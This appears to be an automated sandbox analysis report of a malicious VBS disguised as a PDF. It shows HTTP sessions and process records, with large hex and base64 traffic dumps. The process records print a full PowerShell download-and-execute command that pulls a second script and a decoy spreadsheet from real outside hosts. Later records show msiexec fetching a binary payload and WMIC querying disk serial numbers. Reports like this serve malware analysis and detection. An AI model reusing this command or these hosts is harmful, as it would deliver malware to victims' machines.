                                                                                                                                                                                        2024-12-09 17:48:12 UTC8000INData Raw: 41 41 41 41 41 41 41 42 78 36 50 53 4e 48 6a 6e 46 30 42 32 77 31 59 32 69 6f 4c 2b 6e 56 50 7a 46 30 46 61 62 6e 30 68 79 7a 73 33 44 4b 6b 50 5a 70 39 49 76 57 71 75 32 6c 41 6e 6e 4c 41 79 43 44 4d 7a 35 69 2b 4c 37 49 64 4e 43 78 66 41 43 70 41 4a 4e 61 2f 50 7a 42 68 6e 76 64 45 54 5a 79 64 38 4c 77 66 42 35 41 38 2b 76 61 31 42 45 49 73 73 34 79 43 41 6a 4f 45 54 4b 46 69 70 48 49 71 7a 58 30 43 49 6a 55 69 7a 65 6a 4c 58 72 37 69 57 6c 4c 2b 7a 41 6e 54 36 38 43 33 78 57 37 70 39 74 2b 67 70 2b 77 77 32 70 45 76 78 34 6d 61 2f 37 4d 6b 70 62 34 4f 79 50 63 78 63 68 59 38 33 69 49 4a 70 31 37 4a 43 5a 38 68 6e 46 31 43 6d 4e 49 45 32 69 70 46 30 51 45 6e 58 46 31 4f 51 46 77 43 46 79 7a 73 33 44 4b 6d 50 5a 52 42 71 52 4f 54 46 78 78 66 75 48 32 64
                                                                                                                                                                                        Data Ascii: AAAAAAABx6PSNHjnF0B2w1Y2ioL+nVPzF0Fabn0hyzs3DKkPZp9IvWqu2lAnnLAyCDMz5i+L7IdNCxfACpAJNa/PzBhnvdETZyd8LwfB5A8+va1BEIss4yCAjOETKFipHIqzX0CIjUizejLXr7iWlL+zAnT68C3xW7p9t+gp+ww2pEvx4ma/7Mkpb4OyPcxchY83iIJp17JCZ8hnF1CmNIE2ipF0QEnXF1OQFwCFyzs3DKmPZRBqROTFxxfuH2d
                                                                                                                                                                                        2024-12-09 17:48:12 UTC8000INData Raw: 42 49 69 4f 53 48 4a 7a 43 65 68 73 51 43 69 63 6a 63 4d 38 6e 37 65 62 54 49 53 46 44 49 4d 4e 2b 72 58 55 49 72 58 32 49 4a 56 41 53 47 39 4e 6f 42 74 45 6f 63 6b 56 30 37 53 57 35 63 77 37 46 35 52 2b 66 7a 39 47 69 76 59 35 37 63 77 58 46 35 59 4c 77 34 2f 4f 69 6c 63 68 74 37 32 63 57 76 71 71 77 52 52 69 2b 61 70 31 55 49 59 4b 2f 77 33 75 6d 69 38 31 4d 4f 72 75 34 5a 7a 72 45 72 50 52 71 68 6e 69 6d 6d 78 76 64 6c 76 35 45 49 69 4f 65 78 33 30 48 35 5a 66 6f 55 66 30 63 41 73 5a 6e 44 33 2b 64 72 52 44 67 51 4e 4e 64 6a 76 4f 72 5a 74 69 6b 47 41 30 43 51 50 47 4e 73 6e 58 47 48 4d 77 62 73 4c 6f 30 50 74 6b 52 41 6e 50 71 53 70 4b 52 66 58 48 66 57 46 66 37 4a 35 37 43 67 6b 34 57 4b 4b 77 57 59 6e 2b 4f 6b 57 6e 75 46 72 36 71 73 45 55 67 76 6a
                                                                                                                                                                                        Data Ascii: BIiOSHJzCehsQCicjcM8n7ebTISFDIMN+rXUIrX2IJVASG9NoBtEockV07SW5cw7F5R+fz9GivY57cwXF5YLw4/Oilcht72cWvqqwRRi+ap1UIYK/w3umi81MOru4ZzrErPRqhnimmxvdlv5EIiOex30H5ZfoUf0cAsZnD3+drRDgQNNdjvOrZtikGA0CQPGNsnXGHMwbsLo0PtkRAnPqSpKRfXHfWFf7J57Cgk4WKKwWYn+OkWnuFr6qsEUgvj
                                                                                                                                                                                        2024-12-09 17:48:12 UTC8000INData Raw: 41 2b 66 65 74 75 2b 55 67 39 44 65 31 33 64 4e 76 71 6b 67 48 63 61 4d 51 4f 67 6d 68 6d 39 4b 36 43 71 61 5a 78 52 45 4c 4f 44 34 50 6f 36 2b 61 6f 2b 41 2b 55 43 49 6c 30 36 39 4b 4e 31 4a 43 48 35 46 44 73 33 6e 6b 55 59 73 6f 45 6c 73 69 70 2f 76 54 64 7a 53 4e 71 43 49 62 34 74 4d 35 58 76 4f 42 52 43 49 73 31 73 6a 32 33 4b 33 46 45 56 61 66 41 6f 4f 69 59 66 63 66 33 65 54 46 34 65 66 4f 5a 69 75 69 75 59 53 2b 41 56 75 44 49 53 44 36 36 68 61 6a 72 75 4f 6a 45 49 65 56 4e 70 6a 58 6e 4b 4d 51 2b 6e 48 47 78 54 52 39 38 61 61 53 78 53 47 56 4e 58 61 47 69 36 4a 38 2b 36 4b 52 70 31 38 2f 55 63 58 4a 2f 43 39 59 49 65 52 52 39 68 61 73 6f 4c 4c 68 44 4e 4f 2f 54 46 55 6f 65 71 4d 51 72 38 4a 4f 61 4e 65 46 70 2b 50 54 64 34 75 36 6b 34 6d 6a 45 4c
                                                                                                                                                                                        Data Ascii: A+fetu+Ug9De13dNvqkgHcaMQOgmhm9K6CqaZxRELOD4Po6+ao+A+UCIl069KN1JCH5FDs3nkUYsoElsip/vTdzSNqCIb4tM5XvOBRCIs1sj23K3FEVafAoOiYfcf3eTF4efOZiuiuYS+AVuDISD66hajruOjEIeVNpjXnKMQ+nHGxTR98aaSxSGVNXaGi6J8+6KRp18/UcXJ/C9YIeRR9hasoLLhDNO/TFUoeqMQr8JOaNeFp+PTd4u6k4mjEL


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.44973993.95.216.1754437540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-09 17:48:25 UTC195OUTGET /ab/List%20of%20required%20items.xlsx HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                        Host: www.fornid.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-12-09 17:48:26 UTC347INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 09 Dec 2024 17:48:25 GMT
                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 04:19:39 GMT
                                                                                                                                                                                        ETag: "20426a6-1fa6-62855f93d23a9"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 8102
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
                                                                                                                                                                                        2024-12-09 17:48:26 UTC7845INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 62 ee 9d 68 5e 01 00 00 90 04 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii: PK!bh^[Content_Types].xml (
                                                                                                                                                                                        2024-12-09 17:48:26 UTC257INData Raw: d3 85 02 00 00 b1 05 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 00 78 6c 2f 73 74 79 6c 65 73 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 0e ea cc 7e 10 02 00 00 a2 05 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 96 15 00 00 78 6c 2f 77 6f 72 6b 73 68 65 65 74 73 2f 73 68 65 65 74 31 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 a7 0a e4 bd 3d 01 00 00 57 02 00 00 11 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 17 00 00 64 6f 63 50 72 6f 70 73 2f 63 6f 72 65 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 de 41 16 d9 8a 01 00 00 11 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 50 1a 00 00 64 6f 63 50 72 6f 70 73 2f 61 70 70 2e 78 6d 6c 50 4b 05 06 00 00 00 00 0a 00 0a 00 80 02 00 00 10 1d 00 00
                                                                                                                                                                                        Data Ascii: xl/styles.xmlPK-!~xl/worksheets/sheet1.xmlPK-!=WdocProps/core.xmlPK-!APdocProps/app.xmlPK


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.449754202.71.109.2284435316C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-12-09 17:48:53 UTC167OUTGET /ab/ab.bin HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                        Host: www.tdejb.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-12-09 17:48:54 UTC223INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Mon, 09 Dec 2024 17:48:54 GMT
                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                        Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 449600
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        2024-12-09 17:48:54 UTC7969INData Raw: e4 47 1f 45 3d dd a3 e0 6d 19 db 76 50 37 22 40 fe 29 88 ff 9c 7c 0b 11 04 fc dc ee e6 0b c2 1d 5b 94 dc 82 ef c4 e7 1d a6 e1 fc 84 69 99 af 58 1e ab b9 4a 0e e6 e3 79 a1 6a 74 10 24 8a a5 2d 99 5f fa f9 c4 a1 54 94 8c 94 52 0a 80 b8 26 bd 1e c1 35 f2 74 cf a0 2d 09 a9 df 4e 72 07 af 69 cf 13 e3 0d 6c dc c7 08 65 4d 87 fd 1e 2a a4 07 d2 85 a5 7c af 18 58 d6 ba 87 3d 88 2e 1d 14 a3 fe 66 f0 79 4c 83 90 93 0e e0 9d 4f ba 29 bb e4 92 a6 c0 1c e2 c6 08 f3 81 d7 02 23 81 aa ba 4e 27 17 4d 26 b2 ff c2 bf b0 a6 81 b2 f1 71 1f 79 99 0e c2 4f 27 85 34 34 7c 30 d9 12 e9 25 80 c6 b0 59 04 58 35 50 ed 39 a6 ec d5 7a ad 85 7b 00 f9 03 d9 7f 04 ea fc ec 2f 3d c7 fd 5c 46 c3 3f 1a fb b9 21 ab 26 0a ec 6c ee ec 9c 7a e5 08 31 cb 0a 50 64 fd ae 9e a5 ee 74 60 6e 6d a3 0c
                                                                                                                                                                                        Data Ascii: GE=mvP7"@)|[iXJyjt$-_TR&5t-NrileM*|X=.fyLO)#N'M&qyO'44|0%YX5P9z{/=\F?!&lz1Pdt`nm
                                                                                                                                                                                        2024-12-09 17:48:54 UTC8000INData Raw: 94 c8 5a df 80 bd 7e 84 86 d2 d4 7b 9c af fc 68 81 ad ee 90 97 14 86 8b 6f a7 bd 94 80 a5 ad 7e 12 f9 d6 1c d9 51 c5 35 ab c2 e1 47 a1 0c bb ec e3 30 b7 01 ca 08 82 16 56 50 6c ed 85 59 04 b0 6c 70 10 91 07 29 70 f8 17 cd 02 00 77 d1 3d ab 55 b4 d1 eb e0 0d 83 b4 34 92 41 f5 5a 49 54 56 84 1d d9 1b 28 d9 15 1c ac f0 99 11 0a c4 7a 86 4d 78 5d 9a 8b 6d 42 19 d9 19 18 d6 40 9d ec 84 5a 94 1a b7 b3 6f b5 74 03 c4 f6 9e ae ac 28 3c e0 18 d9 b7 f2 fe 5f 7b b5 4c 35 bc 5e 97 72 67 f4 58 8f 9b 02 9b d1 a4 ec c5 08 c0 ab 9a 40 92 ef bc b2 3c 4b 7e 94 dd f2 bf cc 23 89 ad 77 cc ec 20 43 63 b9 b4 f5 b6 e7 48 a1 72 fd 7e 5e 54 38 f2 40 c6 da 71 6e 3e 45 db 5c 80 09 03 4a b2 ca c3 ce 60 f6 f5 96 ac a7 5e 58 99 69 cb 81 54 92 df a4 6c 1d b7 b3 f8 65 72 f9 1a d7 9b fb
                                                                                                                                                                                        Data Ascii: Z~{ho~Q5G0VPlYlp)pw=U4AZITV(zMx]mB@Zot(<_{L5^rgX@<K~#w CcHr~^T8@qn>E\J`^XiTler
                                                                                                                                                                                        2024-12-09 17:48:54 UTC8000INData Raw: e6 f2 97 50 41 1c 7e 14 68 71 2e 90 15 88 8e 21 e7 bc ce da cb 8a a9 2f a6 f1 bf f4 22 8e 01 fa 0e ac 90 5a 57 fd 5c 55 62 9c 65 71 cb 28 39 63 6d 26 b2 8b 6d 82 47 04 ec ae 02 55 ce 9e 77 e1 94 76 84 f9 b9 d0 6e de ae 0c 21 d2 c4 c0 93 db 8f 74 92 9f d0 d5 2d 93 83 f1 30 c9 a9 a9 30 98 55 1c aa 25 22 ab 48 b0 d4 2d 60 26 12 2c ff 69 ed c5 96 d1 82 f5 3b 99 fc f3 79 ee 90 f2 d8 92 95 59 09 62 2a 7b 3d 98 6d 74 89 d3 8c 27 ca 9b c4 a1 90 24 c4 81 82 e7 67 e4 b8 b2 df e4 6b bf ee 5f 27 bd c6 ae 60 9c e5 2e 3a 99 d4 ca 64 96 f6 f5 67 bc 3c 9e 6f af ea 29 64 40 65 ea b4 ae 0f 30 c7 3a 23 79 20 7b b4 af e7 f3 46 08 e4 bc 76 a9 a8 f0 71 5b 2f df 16 2e 32 6d 79 5c 5b 0c 97 41 19 58 88 8c ac bd 69 03 9a 13 b4 be 95 7a 16 49 13 cf 1d 46 84 a9 88 7a b8 8f 0d ad f1
                                                                                                                                                                                        Data Ascii: PA~hq.!/"ZW\Ubeq(9cm&mGUwvn!t-00U%"H-`&,i;yYb*{=mt'$gk_'`.:dg<o)d@e0:#y {Fvq[/.2my\[AXizIFz
                                                                                                                                                                                        2024-12-09 17:48:54 UTC8000INData Raw: 56 8f 45 fb 31 ec 2d 37 05 9d fe f0 18 d8 18 48 d8 37 4f 39 c4 f6 40 ee fe d4 8d fd c8 90 cd 48 94 6e ad 6b 5d 73 62 50 47 d9 ff c4 9f f8 25 2e d3 4c ab 5e 26 3d 59 90 c0 c1 f2 1f 7c 47 e5 5a b8 59 44 9e b1 7f c6 bc 70 35 55 1b b1 4e 13 11 a1 90 64 63 99 6d 20 ff 79 39 66 09 e5 07 70 74 87 f1 f7 1c 9c 74 78 7c 1d 1a 48 15 1e aa 1a 9d 77 83 22 1e 76 85 ca 54 f2 54 a0 7a 88 4c 5e ad 68 20 8d c2 7a 3e d1 a0 81 1a b9 31 b0 a7 70 ea 13 a1 f4 19 5c a8 90 bf 46 c9 ae 94 9b 2b c8 5c 52 fc 06 dc c0 1d 64 34 84 69 84 6c ef c5 d0 1a cc 3b c5 7e c6 86 d4 de bd 17 80 63 3b ac 44 08 1b b0 e3 af fa e0 ba e0 7c 11 76 21 e0 eb 2a 55 19 a8 c5 03 20 6d 81 30 2b 4e d9 c0 55 79 b6 71 79 2a 64 29 91 94 c4 ba a2 68 43 9e 11 45 5e e7 ea c4 47 69 7a 09 e4 3e d3 4d 5d 36 e8 02 ba
                                                                                                                                                                                        Data Ascii: VE1-7H7O9@Hnk]sbPG%.L^&=Y|GZYDp5UNdcm y9fpttx|Hw"vTTzL^h z>1p\F+\Rd4il;~c;D|v!*U m0+NUyqy*d)hCE^Giz>M]6
                                                                                                                                                                                        2024-12-09 17:48:54 UTC8000INData Raw: 52 d9 1a a5 bb f8 64 b4 28 ae c6 60 db 80 56 85 70 6f 9b ee b1 09 35 47 fe 27 51 5d 6d 61 a8 85 58 e1 4e 14 43 ac d4 9b 4b fe 1c 15 b1 70 68 52 cf 77 61 c9 70 c0 67 e0 69 dc 23 9d c1 45 b8 86 b1 af 3f 51 6a a1 79 c7 df 01 32 64 17 30 98 ba 9b c5 85 15 c7 34 58 c5 70 78 63 55 88 4d a8 34 da ab b3 81 df a0 a0 b1 95 bb 1a 48 93 da b3 c9 e7 df 35 84 3e 05 bc 17 a2 d3 23 02 0b 2a 06 b9 42 92 27 92 80 e7 90 7a 01 88 b9 b3 23 a3 3c 27 9a db ae 05 b3 0e 13 c7 84 c7 10 8e 8a e9 ed a2 48 5c 7d 10 b8 f0 f8 fb cc 9b b6 e4 69 a2 6b 4b 8d a2 84 12 a5 54 6e e9 c6 c9 70 48 b2 61 8a b0 a0 62 56 d6 81 2c ca 6b cb 23 18 79 7b cf fe 54 0e c1 80 84 73 fd 26 02 c3 81 7e 73 2a 89 ee 3b ef 53 c6 6b c3 98 75 ee 23 cc 88 ca 88 78 d6 ee f7 d2 63 4c 5f e9 2a 57 28 4a be 5b ba 2a cd
                                                                                                                                                                                        Data Ascii: Rd(`Vpo5G'Q]maXNCKphRwapgi#E?Qjy2d04XpxcUM4H5>#*B'z#<'H\}ikKTnpHabV,k#y{Ts&~s*;Sku#xcL_*W(J[*
                                                                                                                                                                                        2024-12-09 17:48:55 UTC8000INData Raw: 97 0c 2e ef fd a9 89 bc 69 4b 8d c4 88 5c 0f dc b5 40 0c d7 e5 82 74 b6 ca 64 25 1f 20 27 28 13 ed 94 4b d5 bd c9 5b fc b1 f3 a2 da e9 13 b0 00 a7 a5 80 fc 7f 3d 46 63 5f c9 d8 66 8c 4f fc f1 90 f3 fe 2c f1 c4 cb 47 79 11 a5 f3 53 4d 74 7d 15 84 c3 ad bc 21 ee 8a 8a dd 57 90 9b 3d bf 69 2c 28 fd a1 6d c1 f2 e6 8b d7 21 8a 74 7d 34 cf 65 ef e2 51 13 97 1e 95 02 32 82 7c bc 9c c4 61 a7 ff 12 0d 9a 49 0d a0 18 9f a2 fc ca 01 fe 0d 95 1d 19 17 4f 01 4b 59 fc fa 52 7c bf e6 f8 10 fb 28 05 0d da 7f b9 3d cc e7 97 fa 93 26 ff 12 23 40 83 3c a2 7d a9 63 f9 81 44 0c 69 be 99 79 e3 7e ff a3 73 bf 9f da 97 ba 4c a7 7f f4 08 fe 19 49 b6 1b 8b ba 59 be 95 d9 13 1d 7f ab cd b2 25 a5 b8 d0 ff bb 5f 30 91 e0 8b bd 9d bd d4 fa 78 a7 27 dc f8 c2 3b 1b 6c 68 84 8b c0 fa 2a
                                                                                                                                                                                        Data Ascii: .iK\@td% '(K[=Fc_fO,GySMt}!W=i,(m!t}4eQ2|aIOKYR|(=&#@<}cDiy~sLIY%_0x';lh*
                                                                                                                                                                                        2024-12-09 17:48:55 UTC8000INData Raw: 5e e0 34 e6 79 3e d2 8b 8c 98 b5 59 1f b0 00 a9 5f 6e 88 7d 7c 52 06 f2 39 05 b9 3a 82 26 c6 8c a4 fa 7f 38 22 08 1e ae 34 11 e3 ad 1f 74 62 4d 97 ca 29 36 3c 97 63 8c 86 4e ff a7 94 a6 cb fc 26 d5 cc af a3 f1 05 ec 15 f8 c9 34 f1 ec 69 f7 1c 66 36 cd f5 34 de 72 06 d0 1f 2f e9 3d 5c 87 56 fb 22 d3 76 d4 b6 13 de 67 8a 99 61 68 d5 0b 23 ae f4 39 2f 93 2d 68 cd 12 ff 07 10 00 5d 6f 45 4c 9b 78 6e 79 37 bf b2 93 73 39 8a e2 bd ad 20 ef 4d eb ec 08 a8 fb 65 60 ac 93 0c 9f 58 94 fe b7 5f 3b 09 16 ed cf 4b 51 49 cb cf 92 bf 78 4d 8e 6d 60 21 92 44 8b f1 e4 37 4f 15 67 82 68 b3 bd 52 57 32 fd 8e bf 61 75 54 c8 e4 94 d6 8b 20 32 81 ff 98 af 28 47 7f 13 88 c4 64 3e dc 7f 9c f0 1c 35 97 e9 eb b1 db 39 8c 0e c7 d3 ca b5 b3 40 99 21 46 7c b6 82 cd 68 14 40 4d 40 29
                                                                                                                                                                                        Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                                                                                                                        2024-12-09 17:48:55 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
                                                                                                                                                                                        Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                                                                                                                        2024-12-09 17:48:55 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                                                                                                                        Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
                                                                                                                                                                                        2024-12-09 17:48:55 UTC8000INData Raw: d3 f5 8c f0 02 82 cc ae c5 7f b7 4d 26 2f 5c ec f1 37 6d d9 1c 4f 30 f8 e6 6d 21 6f 25 35 48 9e 3e 24 d7 43 8a 87 2c 4b 93 c9 9d a0 18 5c f8 e9 b2 7a e0 ee d5 54 f1 3e d4 3c 7f 15 93 5d 4f 03 29 ba a6 54 28 ae 16 8c eb 86 93 b7 02 14 11 84 1d cc 4a 5e 05 0f 05 fd 42 94 37 d7 a9 45 cc b2 48 85 cd bd e3 53 df 24 e0 b8 fd b0 f7 05 ea df 43 e4 f1 a3 01 52 24 2c 5f 32 4e 67 72 35 22 08 43 82 9f aa aa 32 10 49 48 bd a5 9e 15 a5 e5 b7 98 d2 71 40 f5 d3 47 a5 d0 d2 fb 77 62 0f 35 7c 79 60 02 54 e9 58 7e b0 4d f2 e8 78 9c 69 a5 86 46 26 24 70 7a 07 23 3b 6a 04 f9 b4 91 72 2c 53 8f a2 2c 9f ea f3 a8 37 bd 5d 6a bf 7c 7d d8 34 6d 61 6f 5c b1 5f a6 b3 0f c6 ff 25 ab 76 b6 e7 e3 b1 91 c9 89 9f 4a 98 65 47 da 85 c3 64 6f 82 bc bb fb ea 38 62 96 54 78 9f bc 2c e1 71 52
                                                                                                                                                                                        Data Ascii: M&/\7mO0m!o%5H>$C,K\zT><]O)T(J^B7EHS$CR$,_2Ngr5"C2IHq@Gwb5|y`TX~MxiF&$pz#;jr,S,7]j|}4mao\_%vJeGdo8bTx,qR


                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                        Start time:12:47:56
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services pdf.vbs"
                                                                                                                                                                                        Imagebase:0x7ff7b3d80000
                                                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:12:47:56
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.tequila.ae/wh/wh.vbs' -destination 'C:\Users\Public\udkz59n9.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\lsm5k8gou5bjv.xlsx'
                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                        Start time:12:47:56
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                        Start time:12:48:02
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\udkz59n9.vbs"
                                                                                                                                                                                        Imagebase:0x7ff7b3d80000
                                                                                                                                                                                        File size:170'496 bytes
                                                                                                                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:12:48:04
                                                                                                                                                                                        Start date:09/12/2024
                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:wmic diskdrive get caption,serialnumber
                                                                                                                                                                                        Imagebase:0x7ff6f5db0000
